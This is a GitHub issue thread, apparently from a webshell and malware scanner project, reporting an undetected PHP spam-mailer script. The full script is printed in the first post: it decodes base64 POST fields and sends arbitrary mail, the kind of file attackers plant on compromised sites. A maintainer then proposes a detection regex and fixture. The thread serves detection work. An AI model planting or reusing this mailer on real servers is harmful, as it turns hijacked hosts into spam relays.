spam mail file undetected #34

Hugo-Carattoni · 2017-02-10T23:29:09Z

This type of file are not detected:

if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
        {
        echo "indata_error";
        exit;
        }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
        echo "sent_ok";
else
        echo "sent_error";
?>

gallart · 2017-02-10T23:31:06Z

Hello Hugo,

Can you propose merge resquest with this new pattern as webshell + fixture file ? (see my previous MR)

base64_decode$\$_POST\["mailto"\]$;

Thanks,

Gaëtan

soullivaneuh · 2017-04-21T12:05:01Z

Please use code blocks for snippet. I corrected your post @Hugo-Carattoni

More information here: https://guides.github.com/features/mastering-markdown/

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

spam mail file undetected #34

spam mail file undetected #34

Hugo-Carattoni commented Feb 10, 2017 •

edited by soullivaneuh

Loading

gallart commented Feb 10, 2017

soullivaneuh commented Apr 21, 2017

spam mail file undetected #34

spam mail file undetected #34

Comments

Hugo-Carattoni commented Feb 10, 2017 • edited by soullivaneuh Loading

gallart commented Feb 10, 2017

soullivaneuh commented Apr 21, 2017

Hugo-Carattoni commented Feb 10, 2017 •

edited by soullivaneuh

Loading